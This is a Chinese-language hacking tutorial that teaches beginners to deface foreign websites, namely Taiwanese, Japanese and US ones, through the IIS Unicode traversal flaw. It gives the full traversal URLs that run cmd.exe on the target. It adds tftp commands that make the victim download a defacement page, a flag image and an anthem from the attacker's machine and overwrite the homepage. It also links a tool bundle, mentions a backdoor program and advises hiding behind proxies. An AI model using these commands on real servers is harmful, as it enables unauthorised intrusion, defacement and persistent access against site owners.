|
傻瓜式入侵教学:利用U漏洞入侵
前段时间是不是看到很多台湾和日本的网站被黑?嘿,一打开该网站,看到的是咱门中国的国旗在飘,还唱着国歌呢,感觉是不是很爽?哈哈,好,这次就教你用最简单的U漏洞也来黑黑,让你尝试做黑客的滋味,闲话少说,进入正题吧。
一.需要用到的软件有好几个,为了方便大家,我把所要用的工具都集中在一起,
你下载后解压就行了,点击下载http://www.sandflee.net/downloads/szgj.zip
解压后里面有多个文件,每个文件在以下的教程中会一一说到作用,没有说到的就不要管了,是一些系统文件。
二.手中有了武器还等什么啊?同志门,冲啊。。。。。。。
首先运行牛族Uscan.exe,这是一个U漏洞扫描器,只需填上IP,它就会自动扫描
有U漏洞的机器。目标地区代码处,你要扫描台湾的就填3吧,美国和日本的就填
5吧,你自己选择,线程填20,这样速度快点,其他的就不改了,用默认的,好了,按开始扫描,你要是选的IP段好的话等一下就有结果在中间的窗口中看到,一定要有耐心,毕竟入侵不是这么简单的事。等到扫描结果有较多数量时,你就可以停下来,关掉扫描器,这时在你的文件中会多了一个feitiango.htm的网页文件,对,这就是扫描漏洞的报告,里面有你刚才扫描的结果,好了,打开这个网页,看到上面有很多IP地址和一些的代码,选其中的一个,(举例说明)
2**.**.100.213/scripts/..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
打开你的浏览器,在地址栏上打上这段代码,回车!哈哈~~~看到了对方的C盘。(看不到的试多几次,还看不到的就放弃,可能人家下了补丁,找其他的)内容如下:
Directory of c:\
01/08/24 01:47p
%SystemRoot%
01/07/27 08:55a 0 AUTOEXEC.BAT
01/07/27 08:55a 0 CONFIG.SYS
01/08/23 06:25a 287 default.asp
01/08/23 06:25a 287 default.htm
01/08/22 01:55p 480,588 Exchange Server Setup.log
01/08/23 06:25a 287 index.asp
01/08/23 06:25a 287 index.htm
01/07/27 08:55a
InetPub
01/07/31 03:19p
My PageManager
01/08/22 02:18p 346,030,080 pagefile.sys
01/07/27 08:48a
Program Files
01/07/27 03:39p
program filesSymantec
01/08/24 03:13p
TEMP
01/07/31 03:21p
VSTASCAN
01/08/24 04:06p
WINNT
01/08/01 11:12a
17 File(s) 346,511,816 bytes
771,950,080 bytes free
来到这里,机器就大概能黑了~~~~5555.做黑客是不是很爽?
再来:先看看对方的是什么网站
http://2**.**.100.213/ 回车
呵呵,做得不错的碧纸站,不管它,照黑,我们是来练习的,在网页空白地方
点选鼠标右键,看属性,主要是记住大小:6892字节(重要,一定要记得),
好,再用下面的命令:
http://2**.**.100.213/scripts/..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+set
(这个是查看系统的配置),看到如下内容:
CGI 岿粇
┮﹚ CGI 莱ノ祘Α矪瞶Τ粇ウゼ肚Ч俱 HTTP 夹肈┮肚夹肈琌
COMPUTERNAME=ET-MALL
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword,
*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=close
HTTP_HOST=***.***.***.***
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 2.4)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INCLUDE=C:\Program Files\Mts\Include
INSTANCE_ID=1
LIB=C:\Program Files\Mts\Lib
LOCAL_ADDR=***.***.***.***
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\WINNT\system32;C:\WINNT;c:\program filesSymantec\pcAnywhere;C:\Program
Files\Mts
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=C:\InetPub\wwwroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 8 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISIO
好,在这找到PATH_TRANSLATED=C:\InetPub\wwwroot
(PATH_TRANSLATED后面的也可以是其他,反正后面的就是对方机器主页的所在文件夹,也要记住)
再用如下命令:(查看主页文件夹里的内容)
http://2**.**.100.213/scripts/..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot
看到如下内容:
Directory of c:\inetpub\wwwroot
01/07/27 08:55a
.
01/07/27 08:55a
..
01/08/23 06:25a 287 default.asp
01/08/23 06:25a 6892 default.htm
01/08/23 06:25a 287 index.asp
01/08/23 06:25a 287 index.htm
01/08/01 10:35a
Phone Book Service
01/07/27 08:55a
samples
8 File(s) 1,148 bytes
731,354,624 bytes free
哈哈!~~~`,看到了 6892 default.htm这个了吗?对,这个就是我要你记住的在网页
上看到的字节数,这样就可以确定我们要改的主页文件就是这个!知道了这些还等啊?
快~~快`~~~快,把你的黑页放上去。。。。(我已做好一个黑页在文件夹中,Dt.htm(黑页),guoqi.gif(国旗),china.mid(国歌)当然你也可以放你自己的,哈哈!)
三.运行文件中的tftpd32.exe,(这是一个把你的机器变成小巧服务器的程序,让对方
机器到你的机器上下载文件,有个优点就是直接上传覆盖不提示。但你要上传的文件一定要放在和tftpd32.exe同一个目录下。)见到TFTPD32.EXE的图标出现在右下角的任务栏里,就表示你的机器已可以让对方来下载了。
调用如下命令:
http://2**.**.100.213/scripts/..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+tftp
-i ***.142.210.132 GET DT.htm c:\\inetpub\\wwwroot\\default.htm
(命令的意思是把你机器上的DT.htm文件上传到对方的c:\inetpub\wwwroot目录下,并改名为default.htm,用来覆盖对方已存在的主页文件,记住要把***.142.210.132换成你自己的IP,)
再用同样的命令把国旗和国歌传上去:
http://2**.**.100.213/scripts/..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+tftp
-i ***.142.210.132 guoqi.gif c:\\inetpub\\wwwroot\\guoqi.gif(传国旗)
http://2**.**.100.213/scripts/..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+tftp
-i ***.142.210.132 china.mid c:\\inetpub\\wwwroot\\china.mid(传国歌)
这过程可能要等一下,看你自己的网速而定!
好啦。等把这几个东西都上传完后,你可以用如下命令看一下是否上传成功:
http://2**.**.128.213/scripts/..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot
啊???怎么没变?.........哈哈,忘记了一样东西,就是刷新,(刷新几次还是没变的就是你上传没成功,再上传一次,还
是不变的就换个机器)刷新后看到:
Directory of c:\inetpub\wwwroot
01/07/27 08:55a
.
01/07/27 08:55a
..
01/08/23 06:25a 287 default.asp
01/08/23 06:25a 1520 default.htm
01/08/23 06:25a 287 index.asp
01/08/23 06:25a 287 index.htm
01/08/23 06:25a 15649 guoqi.gif
01/08/23 06:25a 21262 china.mid
01/08/01 10:35a
Phone Book Service
01/07/27 08:55a
samples
8 File(s) 1,148 bytes
731,354,624 bytes free
乖乖。。。。多了2个文件guoqi.gif和china.mid,而且default.htm的字节数也从6892变了1520,
哈哈!`~~~~~~~~~~~~网页已被你改掉了,不信?打开http://2**.**.100.213/,啊?天啊?还是没变?哈哈,,你又忘记了刷新,刷新。。。。。。。。。哈哈!看到什么了?对!!国旗飘扬,国歌高奏!!
爽~~~~~~~~~~~~~~~~~~~~
还不快叫你的好友来看看你的杰作。。。。。。。。哈哈哈!!!!!
一次简单的黑网站已完成~~我也要去吃饭了,,8888~~~~~
还有要补充的就是工具包里还有一个winshell.exe的是一个TELNET程序,便于你留个后门,方法下次再说
警告:不要用以上方法黑国内的主机,否则警察叔叔会找你的!建议你使用浏览器时用代理服务器,至于如何擦PP~~~~~~~~~,请听下回分解!
|